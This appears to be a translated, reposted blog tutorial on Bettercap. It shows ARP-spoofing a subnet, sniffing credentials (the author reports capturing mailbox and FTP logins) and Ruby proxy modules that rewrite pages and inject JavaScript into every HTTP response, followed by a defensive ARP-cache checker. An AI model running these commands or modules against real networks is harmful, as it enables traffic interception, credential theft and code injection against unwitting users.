0x00 Preface
The previous article mentioned that intranet penetration is very interesting; this time we start from a new tool: Bettercap.
0x01 About
Bettercap can be used to carry out a variety of man-in-the-middle attacks; it is modular, portable, and easy to extend.
0x02 Features
When it comes to man-in-the-middle attacks, the best known tool is ettercap. bettercap was not developed to chase it but to replace it, for the following reasons:
1. Ettercap was very successful, but in the new era it is already old.
2. Ettercap filters are complex, and the barrier to using them is high.
3. In large networks, host discovery works poorly.
4. It is not optimised enough; for a researcher it has too many useless functions.
5. It is not extensible enough; developing it requires mastering C++.
0x03 Test Environment Construction
Kali Linux:
git clone https://github.com/evilsocket/bettercap
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem
If an error occurs, execute the following commands:
sudo apt-get install ruby-dev libpcap-dev
sudo gem install bettercap*.gem
The installation then succeeds.
0x04 Parameter Description
Translated, with my own understanding added.
Usage:
-I, --interface IFACE          Specify the network interface name; defaults to eth0
-S, --spoofer NAME             Specify the spoofing module; defaults to ARP. Currently only ARP is supported; new versions will add more options
-T, --target ADDRESS           Specify a single target IP. If not set, the whole subnet is targeted and all hosts in the subnet are scanned automatically; simple and efficient, highly recommended
-O, --log LOG_FILE             Log to a file
-D, --debug                    Debug mode; every step of the operation is recorded in detail, convenient for debugging
-l, --local                    Parse all packets flowing through this machine (this turns on the sniffer); off by default
-X, --sniffer                  Turn on the sniffer
--sniffer-pcap FILE            Save captured packets to a pcap file that can be opened in Wireshark (this turns on the sniffer)
--sniffer-filter EXPRESSION    Configure the BPF filter used by the sniffer (this turns on the sniffer)
-P, --parsers PARSERS          Specify the packet parsers (this turns on the sniffer); supports NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL; defaults to all
--no-discovery                 Use only the current ARP cache and do not scan for other hosts; off by default
--no-spoofing                  Turn off the spoofing module; --spoofer NONE can be used instead
--proxy                        Enable the HTTP proxy and redirect all HTTP requests to this machine; off by default
--proxy-port PORT              Set the HTTP proxy port; defaults to 8080
--proxy-module MODULE          Specify the Ruby module to load
--httpd                        Turn on the HTTP server; off by default
--httpd-port PORT              Specify the HTTP server port; defaults to 8081
--httpd-path PATH              Specify the HTTP server root path; defaults to ./
-H, --help                     Help (in English)
0x05 Function Test
1. HOST DISCOVERY + ARP man-in-the-middle
sudo bettercap -X
Scans all intranet hosts; a fool-proof operation that scans and ARP-spoofs automatically so that all traffic passes through this machine.
2. CREDENTIALS SNIFFER
Extracts valuable information from the traffic, including:
- URLs being visited
- HTTPS hosts being visited
- HTTP POSTed data
- HTTP Basic and Digest authentications
- FTP credentials
- IRC credentials
- POP, IMAP and SMTP credentials
- NTLMv1/v2 (HTTP, SMB, LDAP, etc.) credentials
Examples of usage:
Default fool-proof mode, all features turned on:
sudo bettercap -X
Login data for a 163 mailbox was captured.
Specify which packet parsers to use:
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
Capturing the FTP credentials of 192.168.40.146.
3. MODULAR TRANSPARENT PROXY
Proxy capability to intercept and tamper with HTTP traffic.
Examples of usage:
To turn on the proxy feature:
sudo bettercap --proxy
Turn on the proxy feature and specify the port:
sudo bettercap --proxy --proxy-port=8081
Turn off ARP spoofing and turn on the proxy only:
sudo bettercap -S NONE --proxy
Turn on the proxy function and load the specified Ruby module:
sudo bettercap --proxy --proxy-module=hack_title.rb
Ruby Reference Example:
    class HackTitle < Proxy::Module
      def on_request( request, response )
        # is it a html page?
        if response.content_type == 'text/html'
          Logger.info "Hacking http://#{request.host}#{request.url} title tag"
          # make sure to use sub! or gsub! to update the instance
          response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )
        end
      end
    end
This module replaces the <title> of every HTML page passing through the proxy.
4. BUILTIN HTTP SERVER
Built-in HTTP server functionality, used here to tamper with the content of HTTP responses.
Examples of usage:
Inject a JS file into every HTTP response on the network:
sudo bettercap --httpd --httpd-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
Ruby Reference Example:
    class InjectJS < Proxy::Module
      def on_request( request, response )
        # is it a html page?
        if response.content_type == 'text/html'
          Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
          # get the local interface address and HTTPD port
          localaddr = Context.get.iface[:ip_saddr]
          localport = Context.get.options[:httpd_port]
          # inject the js
          response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script>" )
        end
      end
    end
0x06 Test Experience
Highlights:
A man-in-the-middle attack framework that is portable and simple to install; it integrates a variety of common functions, is modular, and automates the spoofing attack, which greatly improves efficiency and lowers the barrier to both using and extending the tool.
Shortcomings:
Currently only ARP spoofing is supported and the feature set still needs to be completed. Windows is not supported for now.
0x07 Summary
I previously developed an ARP spoofing and man-in-the-middle attack program in C++, and I personally think the key to successful ARP spoofing is the modification of the ARP cache table. Locking the ARP cache table can currently defend against Bettercap's ARP-based man-in-the-middle attack, but I believe the prospects of bettercap are very broad.
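As an added example (not from the article or from the bettercap project), the Ruby script below checks an ARP table dump for the symptom left behind by the ARP spoofing described above: one MAC address answering for several IPs, or the gateway's MAC differing from a pinned value. It assumes the output format of `ip neigh show` on Linux; the sample lines, addresses and the trusted gateway MAC are constructed.

```ruby
# Constructed sample of `ip neigh show` output. The gateway 192.168.40.1 and
# the host 192.168.40.146 both resolve to the same MAC, which is what a host
# poisoning the whole subnet looks like from a victim's ARP cache.
SAMPLE_NEIGH = <<~NEIGH
  192.168.40.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
  192.168.40.146 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
  192.168.40.20 dev eth0 lladdr 52:54:00:11:22:33 REACHABLE
  192.168.40.99 dev eth0 FAILED
NEIGH

# Pinned (trusted) gateway mapping, e.g. recorded while the network was known
# to be clean. Placeholder value for illustration.
TRUSTED = { "192.168.40.1" => "52:54:00:de:ad:01" }

# Parse `ip neigh` lines into { ip => mac }. Entries without an lladdr
# (FAILED / INCOMPLETE) carry no MAC and are skipped.
def parse_neigh(text)
  text.each_line.with_object({}) do |line, table|
    fields = line.split
    next unless (i = fields.index("lladdr"))
    table[fields[0]] = fields[i + 1].downcase
  end
end

# Return findings as strings: a MAC claiming several IPs, or a trusted IP
# whose cached MAC differs from the pinned one.
def arp_findings(table, trusted = TRUSTED)
  findings = []
  table.group_by { |_, mac| mac }.each do |mac, pairs|
    ips = pairs.map(&:first)
    findings << "MAC #{mac} answers for #{ips.size} IPs: #{ips.join(', ')}" if ips.size > 1
  end
  trusted.each do |ip, mac|
    seen = table[ip]
    findings << "#{ip} expected #{mac} but cache holds #{seen}" if seen && seen != mac.downcase
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  arp_findings(parse_neigh(SAMPLE_NEIGH)).each { |f| puts "ALERT: #{f}" }
end
```

On Linux the pinning the author refers to can be done with `ip neigh replace <gateway-ip> lladdr <gateway-mac> dev eth0 nud permanent`, after which the entry is no longer overwritten by unsolicited ARP replies.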
0x08 Supplement
Bettercap:
http://www.bettercap.org/
My knowledge is limited; additions are welcome.
Note: This article was also posted to the cloud knowledge base; its content has been tested on Ubuntu 14.04 without problems. If you have any questions, please contact me.
Reposted: Man-in-the-middle attack test using the Bettercap framework